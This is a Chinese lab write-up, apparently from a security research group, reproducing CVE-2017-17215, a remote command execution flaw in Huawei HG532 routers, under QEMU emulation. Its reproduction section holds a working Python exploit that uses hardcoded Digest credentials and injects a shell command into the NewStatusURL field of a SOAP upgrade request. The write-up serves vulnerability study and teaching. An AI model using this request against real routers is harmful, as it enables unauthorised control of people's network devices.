星期五实验室
漏洞简介
配置
# interfaces(5) file used by ifup(8) and ifdown(8)
auto lo
iface lo inet loopback
auto ens33
iface ens33 inet manual
up ifconfig ens33 0.0.0.0 up
auto br0
iface br0 inet dhcp
bridge_ports ens33
bridge_maxwait 0
#!/bin/sh
# Script to bring a network (tap) device for qemu up.
# The idea is to add the tap device to the same bridge
# as we have default routing to.
# in order to be able to find brctl
echo "Executing /etc/qemu-ifup"
echo "Bringing $1 for bridge mode..."
sudo /sbin/ifconfig $1 0.0.0.0 promisc up
echo "Adding $1 to br0..."
sudo /sbin/brctl addif br0 $1
sleep 3
#启动桥接网络赋予可执行权限
sudo chmod a+x /etc/qemu-ifup
#重启网络服务,使配置生效(注意这个地方配置正常之后,如果你是mac,可能会让你输入mac密码,windows我不知道)
sudo /etc/init.d/networking restart
#关闭ens33,启动桥接网络br0(这里如果显示eth0不存在没关系,直接启动br0)
sudo ifdown eth0
sudo ifup br0
如图所示,当前网卡为br0
配置完之后,如果下面qemu虚拟机配置之后,仍然无法获取ip,重启ubuntu
按照常规配置大概率出bug,所以这里我们添加路由
br0和tap0的路由配置好后即可
sudo qemu-system-mips -M malta -kernel vmlinux-2.6.32-5-4kc-malta -hda debian_squeeze_mips_standard.qcow2 -append "root=/dev/sda1 console=tty0" -net nic,macaddr=00:16:3e:00:00:01 -net tap -nographic
如果你的多次运行qemu,可能会出现如下错误
<img src="https://i.loli.net/2021/09/02/Pa1zTB9lYoLteEg.png" alt="image-20210902143652004" style="zoom:50%;" />
这是服务没有退出导致的
ps查出当前qemu进程号,kill掉就好了
ps -e | grep 'qemu'
<img src="https://i.loli.net/2021/09/02/aRwVdGWEtqnrKPy.png" alt="image-20210902143845743" style="zoom:50%;" />
sudo kill 3307
即可
nano /etc/network/interfaces
复现流程
binwalk -Me HG532eV100R001C01B020_upgrade_packet.bin
chroot /root/squashfs-root /bin/sh
虚拟机开启监听
nc -vv 192.168.183.161 37215
import requests
headers = {
"Authorization": "Digest username=dslf-config, realm=HuaweiHomeGateway, nonce=88645cefb1f9ede0e336e3569d75ee30, uri=/ctrlt/DeviceUpgrade_1, response=3612f843a42db38f48f59d2a3597e19c, algorithm=MD5, qop=auth, nc=00000001, cnonce=248d1a2560100669"
}
data = '''<?xml version="1.0" ?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">
<NewStatusURL>;/bin/busybox ls;</NewStatusURL>
<NewDownloadURL>HUAWEIUPNP</NewDownloadURL>
</u:Upgrade>
</s:Body>
</s:Envelope>
'''
requests.post('http://192.168.183.161:37215/ctrlt/DeviceUpgrade_1',headers=headers,data=data)
原理分析
qemu安装及建立通讯
由于初学者对于QEMU的安装还是比较懵逼,所以这里给大家上一个简单的安装流程
参考链接:
https://zhuanlan.zhihu.com/p/486923010
apt-get install qemu qemu-system qemu-user-static
安装依赖文件:
apt-get install libglib2.0 libglib2.0-dev autoconf automake libtool uml-utilities bridge-utils
brctl addbr Virbr0
ifconfig Virbr0 192.168.183.100/24 up
qemu-system-mips -M malta -kernel vmlinux-2.6.32-5-4kc-malta -hda debian_squeeze_mips_standard.qcow2 -append "root=/dev/sda1 console=tty0" -netdev tap,id=tapnet,ifname=tap0,script=no -device rtl8139,netdev=tapnet -nographic
ifconfig eth0 192.168.183.102/24 up
参考链接:
https://bbs.pediy.com/thread-269188.htm#msg_header_h1_1
https://zhuanlan.zhihu.com/p/486923010
FRIDAY LAB
星期五实验室成立于2017年,汇集众多技术研究人员,在工业互联网安全前瞻技术研究方向上不断进取。星期五实验室由海内外知名高校的学院精英及来自于顶尖企业的行业专家组成,且大部分人员来自国际领先、国内知名的黑客战队——浙大AAA战队。作为木链科技专业的技术研发团队,星期五实验室凭借精湛的专业技术水平,为产品研发提供新思路、为行业技术革新探索新方向。
扫二维码|关注我们
星期五实验室
FRIDAY LAB
原文始发于微信公众号(星期五实验室):CVE-2017-17215(华为HG532远程命令执行漏洞)复现学习
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论